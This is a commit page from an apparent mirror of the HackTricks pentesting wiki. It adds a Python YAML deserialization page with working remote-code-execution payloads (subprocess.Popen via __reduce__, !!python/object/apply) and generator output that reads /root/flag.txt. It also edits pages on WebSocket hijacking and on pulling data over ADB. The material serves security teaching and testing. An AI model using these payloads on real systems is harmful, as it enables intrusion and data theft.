0x22bb
/
hacktricks
mirror of https://github.com/carlospolop/hacktricks.git
1
2
Fork 0
Code Releases Activity

GitBook: [#2846] python yaml deserialization

This commit is contained in:
CPol 2021-11-17 20:11:22 +00:00 committed by gitbook-bot
parent 39fe2c8470
commit 32628dd460
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
10 changed files with 141 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
.gitbook/assets/image (628) (1) (1).png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 27 KiB

BIN
.gitbook/assets/image (628) (1).png
View File

Binary file not shown.
Side by Side Swipe Overlay

Before

Width:  |  Height:  |  Size: 27 KiB

After

Width:  |  Height:  |  Size: 304 KiB

BIN
.gitbook/assets/image (628).png
View File

Binary file not shown.
Side by Side Swipe Overlay

Before

Width:  |  Height:  |  Size: 304 KiB

After

Width:  |  Height:  |  Size: 212 KiB

1
SUMMARY.md
View File

@ -388,6 +388,7 @@
* [Basic .Net deserialization (ObjectDataProvider gadget, ExpandedWrapper, and Json.Net)](pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md)
* [Exploiting \_\_VIEWSTATE knowing the secrets](pentesting-web/deserialization/exploiting-\_\_viewstate-knowing-the-secret.md)
* [Exploiting \_\_VIEWSTATE without knowing the secrets](pentesting-web/deserialization/exploiting-\_\_viewstate-parameter.md)
* [Python Yaml Deserialization](pentesting-web/deserialization/python-yaml-deserialization.md)
* [Domain/Subdomain takeover](pentesting-web/domain-subdomain-takeover.md)
* [Email Header Injection](pentesting-web/email-header-injection.md)
* [File Inclusion/Path traversal](pentesting-web/file-inclusion/README.md)

2
cloud-security/gcp-security/gcp-buckets-brute-force-and-privilege-escalation.md
View File

@ -17,7 +17,7 @@ Note that other cloud resources could be searched for and that some times these
As other clouds, GCP also offers Buckets to its users. These buckets might be (to list the content, read, write...).
![](<../../.gitbook/assets/image (628) (1).png>)
![](<../../.gitbook/assets/image (628) (1) (1).png>)
The following tools can be used to generate variations of the name given and search for miss-configured buckets with that names:

6
pentesting-web/cross-site-websocket-hijacking-cswsh.md
View File

@ -83,7 +83,9 @@ An attacker can create a **malicious web page** on their own domain which **esta
### Simple Attack
This attack allows you to make the client connect to websocket server and send some predefined value.
Note that when **establishing** a **websocket** connection the **cookie** is **sent** to the server. The **server** might be using it to **relate** each **specific** **user** with his **websocket** **session based on the sent cookie**.&#x20;
Then, if for **example** the **websocket** **server** **sends back the history of the conversation** of a user if a msg with "**READY"** is sent, then a **simple XSS** establishing the connection (the **cookie** will be **sent** **automatically** to authorise the victim user) **sending** "**READY**" will be able to **retrieve** the history of the **conversation**.:
```markup
<script>
@ -100,8 +102,6 @@ function handleReply(event) {
</script>
```
Usually this will be useless as what you want is to get the information the real user is sending and the responses.
### Stealing data from user
Copy the web application you want to impersonate (the .html files for example) and inside the script where the websocket communication is occurring add this code:

8
pentesting-web/deserialization/README.md
View File

@ -130,6 +130,14 @@ For more information about escaping from **pickle jails** check:
[bypass-python-sandboxes](../../misc/basic-python/bypass-python-sandboxes/)
{% endcontent-ref %}
### Yaml** & **jsonpickle
The following page present the technique to **abuse an unsafe deserialization in yamls** python libraries and finishes with a tool that can be used to generate RCE deserialization payload for **Pickle, PyYAML, jsonpickle and ruamel.yaml**:
{% content-ref url="python-yaml-deserialization.md" %}
[python-yaml-deserialization.md](python-yaml-deserialization.md)
{% endcontent-ref %}
## NodeJS
### `__proto__` and `prototype` pollution

123
pentesting-web/deserialization/python-yaml-deserialization.md Normal file
View File

@ -0,0 +1,123 @@
# Python Yaml Deserialization
## Yaml **Deserialization**
**Yaml **python libraries is also capable to** serialize python objects** and not just raw data:
```
print(yaml.dump(str("lol")))
lol
...
print(yaml.dump(tuple("lol")))
!!python/tuple
- l
- o
- l
print(yaml.dump(range(1,10)))
!!python/object/apply:builtins.range
- 1
- 10
- 1
```
Check how the **tuple** isnt a raw type of data and therefore it was **serialized**. And the same happened with the **range** (taken from the builtins).
![](<../../.gitbook/assets/image (628).png>)
**safe\_load()** or **safe\_load\_all()** uses SafeLoader and **dont support class object deserialization**. Class object deserialization example:
```python
import yaml
from yaml import UnsafeLoader, FullLoader, Loader
data = b'!!python/object/apply:builtins.range [1, 10, 1]'
print(yaml.load(data, Loader=UnsafeLoader)) #range(1, 10)
print(yaml.load(data, Loader=Loader)) #range(1, 10)
print(yaml.load_all(data)) #<generator object load_all at 0x7fc4c6d8f040>
print(yaml.load_all(data, Loader=Loader)) #<generator object load_all at 0x7fc4c6d8f040>
print(yaml.load_all(data, Loader=UnsafeLoader)) #<generator object load_all at 0x7fc4c6d8f040>
print(yaml.load_all(data, Loader=FullLoader)) #<generator object load_all at 0x7fc4c6d8f040>
print(yaml.unsafe_load(data)) #range(1, 10)
print(yaml.full_load_all(data)) #<generator object load_all at 0x7fc4c6d8f040>
print(yaml.unsafe_load_all(data)) #<generator object load_all at 0x7fc4c6d8f040>
#The other ways to load data will through an error as they won't even attempt to
#deserialize the python object
```
The previous code used **unsafe\_load **to load the serialized python class. This is because in **version >= 5.1**, it doesnt allow to **deserialize any serialized python class or class attribute**, with Loader not specified in load() or Loader=SafeLoader.
### Basic Exploit
Example on how to **execute a sleep**:
```python
import yaml
from yaml import UnsafeLoader, FullLoader, Loader
data = b'!!python/object/apply:time.sleep [2]'
print(yaml.load(data, Loader=UnsafeLoader)) #Executed
print(yaml.load(data, Loader=Loader)) #Executed
print(yaml.load_all(data))
print(yaml.load_all(data, Loader=Loader))
print(yaml.load_all(data, Loader=UnsafeLoader))
print(yaml.load_all(data, Loader=FullLoader))
print(yaml.unsafe_load(data)) #Executed
print(yaml.full_load_all(data))
print(yaml.unsafe_load_all(data))
```
## RCE
Kindly note payload creation can be done with **any python YAML module (PyYAML or ruamel.yaml), in the same way**. The same payload can exploit both YAML module or any module based on PyYAML or ruamel.yaml
```python
import yaml
from yaml import UnsafeLoader, FullLoader, Loader
import subprocess
class Payload(object):
def __reduce__(self):
return (subprocess.Popen,('ls',))
deserialized_data = yaml.dump(Payload()) # serializing data
print(deserialized_data)
#!!python/object/apply:subprocess.Popen
#- ls
print(yaml.load(deserialized_data, Loader=UnsafeLoader))
print(yaml.load(deserialized_data, Loader=Loader))
print(yaml.unsafe_load(deserialized_data))
```
### Tool to create Payloads
The tool [https://github.com/j0lt-github/python-deserialization-attack-payload-generator](https://github.com/j0lt-github/python-deserialization-attack-payload-generator) can be used to generate python deserialization payloads to abuse **Pickle, PyYAML, jsonpickle and ruamel.yaml:**
```bash
python3 peas.py
Enter RCE command :cat /root/flag.txt
Enter operating system of target [linux/windows] . Default is linux :linux
Want to base64 encode payload ? [N/y] :
Enter File location and name to save :/tmp/example
Select Module (Pickle, PyYAML, jsonpickle, ruamel.yaml, All) :All
Done Saving file !!!!
cat /tmp/example_jspick
{"py/reduce": [{"py/type": "subprocess.Popen"}, {"py/tuple": [{"py/tuple": ["cat", "/root/flag.txt"]}]}]}
cat /tmp/example_pick | base64 -w0
gASVNQAAAAAAAACMCnN1YnByb2Nlc3OUjAVQb3BlbpSTlIwDY2F0lIwOL3Jvb3QvZmxhZy50eHSUhpSFlFKULg==
cat /tmp/example_yaml
!!python/object/apply:subprocess.Popen
- !!python/tuple
- cat
- /root/flag.txt
```
## References
For more in depth information about this technique read: [https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf](https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf)

2
pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.md
View File

@ -92,7 +92,7 @@ There could be another problem, if the **response** to the legit request **conta
However, the **HEAD** request **doesn't contain a body** but it usually **contains** the **Content-Length** as if the request was a GET request. Therefore, sending a **HEAD** request **instead of a POST** request you can **read the HEAD Content-Length** bytes of the smuggled request response.
![](<../../.gitbook/assets/image (628).png>)
![](<../../.gitbook/assets/image (628) (1).png>)
### Leaking Internal Headers via Tunneling

4
pentesting/5555-android-debug-bridge.md
View File

@ -39,3 +39,7 @@ adb pull "/sdcard/com.package"
```
You can use this trick to **retrieve sensitive information like chrome passwords**. For more info about this check the information a references provided [**here**](https://github.com/carlospolop/hacktricks/issues/274).
## Shodan
* `android debug bridge`